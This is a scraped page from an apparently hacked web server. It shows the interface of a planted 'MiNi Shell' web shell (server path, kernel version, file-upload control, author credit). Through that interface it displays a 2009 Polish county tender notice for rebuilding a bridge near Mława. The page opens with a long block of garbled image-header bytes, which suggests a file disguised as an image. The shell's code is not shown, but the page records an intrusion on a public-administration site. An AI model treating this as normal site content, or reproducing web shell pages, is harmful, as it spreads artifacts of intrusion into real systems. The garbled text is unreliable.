JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090511/141142-N-2009.html

<p class="kh_header"><b>Mława: Wykonanie przebudowy mostu na rzece Mławce w miejscowości Szreńsk w ciągu drogi powiatowej Nr P4640W Bieżuń - Szreńsk - Mława od km 6+246,30 do km 6+882,00 wraz z dojazdami.</b><br>
<b>Numer ogłoszenia: 141142 - 2009; data zamieszczenia: 11.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Mławie , ul. Stefana Roweckiego "Grota" 10, 06-500 Mława, woj. mazowieckie, tel. 023 6543468, faks 023 6543020.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatmlawski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie przebudowy mostu na rzece Mławce w miejscowości Szreńsk w ciągu drogi powiatowej Nr P4640W Bieżuń - Szreńsk - Mława od km 6+246,30 do km 6+882,00 wraz z dojazdami..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy zakres robót obejmuje:

I.	Roboty rozbiórkowe
- frezowanie nawierzchni bitumicznej jezdni gr. 8cm
- rozbiórka nawierzchni z asfaltu lanego gr. 2cm na chodnikach
- zdjęcie starej izolacji
- demontaż starego krawężnika z kątownika 50x50mm

II.	Roboty do  wykonania
- ułożenie ścieków skarpowych trapezowych
- uzupełnienie ubytków betonu w stożkach nasypów
- wykonanie nowej nawierzchni z asfaltobetonu w obrębie skrzydełek
- wykonanie nowej nawierzchni z asfaltobetonu na płycie pomostu
- wykonanie nowej nawierzchni z asfaltu twardolanego na chodnikach
- montaż krawężnika z kątownika 50x50mm
- oczyszczenie i zabezpieczenie antykorozyjne skorodowanych elementów poręczy
- wykonanie nowej izolacji pomostu z pap termozgrzewalnych
- zabezpieczenie skorodowanego zbrojenia i wykonanie reprofilacji zaprawami niskoskurczowymi PCC powierzchni płyty pomostu, dźwigarów głównych i poprzecznic
- zabezpieczenie antykorozyjne powierzchni betonu powłoką malarską
- oczyszczenie, pomalowanie i przesmarowanie łożysk
- wykonanie dylatacji bitumicznych 50x30x10 w obrębie jezdni zaś w obrębie chodników wkładka neoprenowa i masa zalewowa
- montaż wpustów żeliwnych i rur spustowych celem odwodnienia płyty pomostu
- wzmocnienie dźwigarów głównych w strefie podporowej taśmami węglowymi
- zabezpieczenie skorodowanego zbrojenia i wykonanie reprofilacji zaprawami niskoskurczowymi PCC powierzchni przyczółków
- regulacja koryta rzeki kiszkami faszynowymi
- wykonanie narzutu kamiennego wzdłuż przyczółków.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.22.11.11-3, 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1) Wadium w wysokości  40.000,00zł. powinno być wniesione w terminie do dnia 04 czerwca 2009 r. godz.11 00 .
2) Wadium może być wnoszone w jednej lub w kilku następujących formach:
- pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. Nr 109, poz. 1158 z późn. zm.).

Wadium wnoszone w pieniądzu powinno zostać przelane lub wpłacone na rachunek zamawiającego w BANKU SPÓŁDZIELCZYM W CIECHANOWIE Oddział w Mławie Nr 05  8213  0008  2003  0402  4824  0003 i powinny znajdować się na w/w koncie nie później niż do 04 czerwca 2009r. do godz. 11.00.

3) Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
Jeżeli wadium zostało wniesione w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającym z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy:
1)Nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i ust. 2 ustawy - Prawo Zamówień Publicznych
2)Spełniają warunki określone w art. 22 ust. 1 ustawy - Prawo Zamówień Publicznych
3) Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
4) Posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia
- mają do dyspozycji odpowiednio wykwalifikowane osoby w celu obsadzenia podanych niżej stanowisk:
Kierownik budowy - 5 lat na stanowisku kierownika budowy (doświadczenie w zakresie dróg - posiadanie uprawnień budowlanych)
- posiadają co najmniej niżej wymieniony sprzęt :
koparka o poj. łyżki 0,15 m3 - 0,30 m3, skrapiarka mechaniczna do bitumu, układarka mieszanki mineralno - asfaltowej z automatycznym sterowaniem i podgrzewaną deską, walec ogumiony samojezdny, walec statyczny samojezdny, szczotka mechaniczna do czyszczenia nawierzchni, wiertarka wolnoobrotowa do przygotowania zapraw PCC, piaskarki do czyszczenia konstrukcji stalowych i żelbetowych, sprężarki lub myjki do czyszczenia powierzchni konstrukcji betonowych, samochody samowyładowcze 7 - 10 t	
5) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
- w szczególności Wykonawca musi wykazać, że posiada zdolność kredytową lub środki finansowe w wysokości co najmniej 40 % ceny ofertowej (łącznej ceny brutto wskazanej w ofercie Wykonawcy), podanej przez Wykonawcę w formularzu ofertowym złożonym w niniejszym postępowaniu o udzielenie Zamówienia. W przypadku wspólnego ubiegania się o udzielenie niniejszego Zamówienia przez dwóch lub więcej wykonawców oceniana będzie ich łączna sytuacja.
- posiada ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
6) zrealizowanie w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia co najmniej dwóch zamówień o zbliżonym charakterze i złożoności, co zamówienie podstawowe, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie co najmniej jednej roboty budowlanej, odpowiadającej swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane należycie, 
7) udzielą gwarancji na okres 5 lat, 

Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana według formuły >spełnia - nie spełnia<
Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zawartość i wymogi odnośnie składanej oferty.
1) oferta musi zawierać wypełniony formularz OFERTA, DOWÓD WNIESIENIA WADIUM oraz następujące załączniki:
załącznik nr 1 - pisemne oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 
załącznik nr 2 - pisemne oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 ustawy - Prawo Zamówień Publicznych
załącznik nr 3 - wykaz zrealizowanych w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia co najmniej dwóch zamówień o zbliżonym charakterze i złożoności, co zamówienie podstawowe, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie co najmniej jednej roboty budowlanej, odpowiadającej swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane należycie. W przypadku powierzenia części zamówienia podwykonawcy należy również załączyć powyższe dane o podwykonawcy, 
załącznik nr 4 - opinie Zamawiających, na rzecz których w/w zamówienia były realizowane 
załącznik nr 5 - wykaz pracowników przewidzianych do wykonania zamówienia wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności,
załącznik nr 6 - dokumenty potwierdzające przygotowanie zawodowe kierownika budowy, tj. uprawnienia budowlane z zakresu remontu dróg i zaświadczenie o przynależności do IIB
załącznik nr 7 - wykaz sprzętu, jakim dysponuje Oferent do wykonania zamówienia
załącznik nr 8 - wypełniony kosztorys ofertowy (część III SIWZ)
załącznik nr 9 - aktualny wypis / odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, potwierdzający dopuszczenie Wykonawcy do obrotu prawnego w zakresie objętym zamówieniem oraz zwierającym nazwisko osoby uprawnionej do reprezentowania firmy z datą wystawienia nie wcześniej niż 6 m-cy przed upływem terminu składania ofert
załącznik nr 10 - zaświadczenie z właściwego Urzędu Skarbowego o braku zaległości
podatkowych z datą wystawienia nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
załącznik nr 11 - zaświadczenie z ZUS lub KRUS o braku zaległości w uiszczaniu składek na ubezpieczenie społeczne i zdrowotne z datą wystawienia nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
załącznik nr 12 - aktualną informację z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. l pkt 4 - 8 ustawy, wystawionych nie wcześniej niż 6 m-cy przed upływem terminu składania ofert, w formie oryginału albo kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
załącznik nr 13 - aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 m-cy przed upływem terminu składania ofert , w formie oryginału albo kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę,
załącznik nr 14 - wykaz wszystkich podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, a także zakresu powierzonych im części zamówienia - (wykaz podwykonawców) wraz z oświadczeniami o gotowości do współpracy przy realizacji zamówienia,
załącznik nr 15 - sprawozdanie finansowe albo jego części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty, zysk oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres,
załącznik nr 16 - informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym wykonawca posiada podstawowy rachunek bankowy, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 m-ce przed upływem terminu składania ofert, w formie oryginału albo kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę,
załącznik nr 17 - polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, w formie oryginału albo kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiatmlawski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Mławie
ul. Stefana Roweckiego Grota 10
06 - 500 Mława.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2009 godzina 11:00, miejsce: Powiatowy Zarząd Dróg w Mławie
ul. Stefana Roweckiego Grota 10
06 - 500 Mława
SEKRETARIAT.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com